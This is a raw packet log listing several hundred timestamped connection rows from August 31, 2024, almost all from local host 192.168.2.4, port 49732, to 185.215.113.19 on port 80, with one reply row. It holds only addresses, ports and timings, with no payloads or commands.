Aug 31, 2024 22:41:57.653233051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653254986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653278112 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653304100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653403997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653424025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653495073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653516054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653541088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653599024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653628111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653650999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653738976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653764009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653783083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653806925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653991938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.653991938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654014111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654037952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654061079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654083014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654103994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654124975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654145956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654169083 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654191971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654290915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654314995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654340982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654367924 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654476881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654476881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654476881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654510975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654607058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654673100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654673100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654721975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654778004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654815912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654860020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654973984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.654999018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655025959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655046940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655132055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655155897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655174971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655200005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655221939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655379057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655404091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655427933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655448914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655471087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655494928 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655520916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655544043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655565977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655589104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655611038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655635118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655656099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655775070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655797005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655823946 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655844927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655864954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655956984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.655981064 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656043053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656063080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656090975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656174898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656196117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656217098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656236887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656404972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656429052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656452894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656475067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656495094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656517982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656537056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656560898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656584978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656609058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656630993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656653881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656675100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656697035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656718969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656738997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656764030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656784058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656805038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656829119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656847000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.656975031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657001972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657089949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657089949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657114029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657171011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657192945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657218933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657299042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657320023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657345057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657367945 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657516956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657542944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657563925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657584906 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657612085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657634020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657659054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657682896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657702923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657721996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657742023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657768011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657871962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657871962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657893896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.657913923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658001900 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658027887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658114910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658138037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658200979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658224106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658246994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658265114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658292055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658463955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658484936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658508062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658529997 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658552885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658574104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658602953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658616066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658641100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658668995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658756018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658777952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658802032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658893108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658920050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.658942938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659025908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659048080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659111023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659132004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659156084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659179926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659199953 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659224987 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659249067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659272909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659291983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659315109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659334898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659357071 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659379005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659396887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659563065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659588099 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659610033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659629107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659655094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659677029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659699917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659719944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659739971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659769058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659796000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659912109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.659935951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660006046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660029888 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660048962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660106897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660135031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660192013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660228014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660247087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660271883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660414934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660456896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660506964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660516977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660537958 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660558939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660582066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660602093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660625935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660720110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660743952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660763979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660830021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660851955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660938025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660953999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.660983086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661004066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661087990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661108971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661130905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661149979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661173105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661324024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661345005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661370039 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661391020 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661416054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661429882 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661458015 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661484957 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661509037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661530972 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661645889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661668062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661736965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661761999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661784887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661838055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661861897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661884069 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661907911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.661997080 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662014008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662046909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662070990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662245035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662271023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662292004 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662314892 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662337065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662358999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662379980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662401915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662421942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662446022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662470102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662585974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662674904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662674904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662700891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662781000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662801981 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662825108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662880898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662906885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662923098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662947893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662970066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.662975073 CEST	80	49732	185.215.113.19	192.168.2.4
Aug 31, 2024 22:41:57.663645029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663667917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663688898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663716078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663743019 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663769960 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663793087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663815022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663945913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663976908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.663990974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664019108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664091110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664113998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664140940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664201975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664226055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664248943 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664275885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664365053 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664391994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664412975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664438009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664462090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664628983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664649963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664671898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664695978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664716959 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664738894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664762974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664786100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664808035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664834023 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664936066 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.664961100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.665025949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.665049076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.665076017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.665138006 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.665160894 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.665183067 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.665208101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669241905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669262886 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669363022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669378996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669403076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669424057 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669475079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669498920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669518948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669533014 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669578075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669600010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669620037 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669641018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669653893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669707060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669725895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669747114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669769049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669780970 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669934034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669955969 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669974089 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.669987917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670011044 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670030117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670042038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670062065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670079947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670097113 CEST	49732	80	192.168.2.4	185.215.113.19
